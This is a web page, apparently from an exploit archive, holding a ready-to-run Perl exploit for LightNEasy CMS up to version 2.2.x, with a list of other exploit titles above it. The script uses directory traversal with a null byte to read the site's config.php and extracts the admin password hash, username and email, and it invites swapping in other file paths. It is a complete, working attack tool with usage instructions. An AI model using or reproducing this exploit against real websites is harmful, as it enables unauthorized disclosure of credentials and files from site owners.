477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
118 lines
3.4 KiB
Text
Executable file
118 lines
3.4 KiB
Text
Executable file
#!/usr/bin/perl
|
|
#
|
|
# LightNEasy sql/no-db <= 2.2.x system config disclosure exploit
|
|
#
|
|
# by staker
|
|
# ------------------------------
|
|
# mail: staker[at]hotmail[dot]it
|
|
# url: http://www.lightneasy.org
|
|
# ------------------------------
|
|
#
|
|
# it works with magic_quotes_gpc=off
|
|
#
|
|
# short explanation:
|
|
#
|
|
# -----------------------------------------------------
|
|
# LightNEasy contains one flaw that allows an attacker
|
|
# to disclose a local file because of file_get_contents
|
|
# it's possible to retrieve the configuration file
|
|
# passing as argument '../data/config.php'. Example:
|
|
# http://[host]/LightNEasy.php?page=../data/config.php
|
|
# ----------------------------------------------------
|
|
# Today is: 09 June 2009
|
|
# Location: Italy,Turin.
|
|
# http://www.youtube.com/watch?v=uXN0pE2Hdt8
|
|
# ----------------------------------------------------
|
|
|
|
use IO::Socket;
|
|
|
|
|
|
my $domain = $ARGV[0] || &usage;
|
|
|
|
|
|
launch_cmd("../data/config.php"); # if you wanna disclose another file,change it
|
|
|
|
|
|
sub launch_cmd()
|
|
{
|
|
my ($data,$result,$html);
|
|
|
|
my $page = $_[0] || die $!;
|
|
my $path = socket_url($domain,'path');
|
|
my $host = socket_url($domain,'host');
|
|
|
|
my $TCP = IO::Socket::INET->new(
|
|
PeerAddr => $host,
|
|
PeerPort => 80,
|
|
Proto => 'tcp',
|
|
) || die $!;
|
|
|
|
$data .= "GET /$path/LightNEasy.php?page=$page%00 HTTP/1.1\r\n";
|
|
$data .= "Host: $host\r\n";
|
|
$data .= "User-Agent: Lynx (textmode)\r\n";
|
|
$data .= "Connection: close\r\n\r\n";
|
|
|
|
$TCP->send($data);
|
|
|
|
while (<$TCP>) {
|
|
$html .= $_;
|
|
}
|
|
|
|
if ($html =~ /password']="([0-9a-f]{40})"/i) {
|
|
$result .= "Password: $1\n";
|
|
}
|
|
if ($html =~ /fromname']="(.+?)"/i) {
|
|
$result .= "Username: $1\n";
|
|
}
|
|
if ($html =~ /toemail']="(.+?)"/i) {
|
|
$result .= "E-Mail: $1\n";
|
|
}
|
|
|
|
print $result;
|
|
}
|
|
|
|
|
|
sub socket_url()
|
|
{
|
|
my ($url,$ext) = @_;
|
|
|
|
$url =~ s/http:\/\/// if $url =~ /^http:\/\/(.+?)+$/i;
|
|
|
|
@GLOBALS = split /\//,$url;
|
|
|
|
if ($ext eq 'host') {
|
|
return $GLOBALS[0];
|
|
}
|
|
elsif ($ext eq 'path') {
|
|
return $GLOBALS[1];
|
|
}
|
|
else {
|
|
return join('/',@GLOBALS);
|
|
}
|
|
}
|
|
|
|
|
|
sub parse_url
|
|
{
|
|
my $string = shift @_ || die($!);
|
|
|
|
if ($string !~ /^http:\/\/?/i) {
|
|
$string = 'http://'.$string;
|
|
}
|
|
|
|
return $string;
|
|
}
|
|
|
|
|
|
sub usage()
|
|
{
|
|
print "[*------------------------------------------------------------*]\n".
|
|
"[* LightNEasy sql/no-db < 2.2.x sys config disclosure exploit *]\n".
|
|
"[*------------------------------------------------------------*]\n".
|
|
"[* Usage: perl light.pl [domain] *]\n".
|
|
"[* [domain] domain -> http://localhost/lightneasy *]\n".
|
|
"[*------------------------------------------------------------*]\n";
|
|
exit;
|
|
}
|
|
|
|
# milw0rm.com [2009-06-10]
|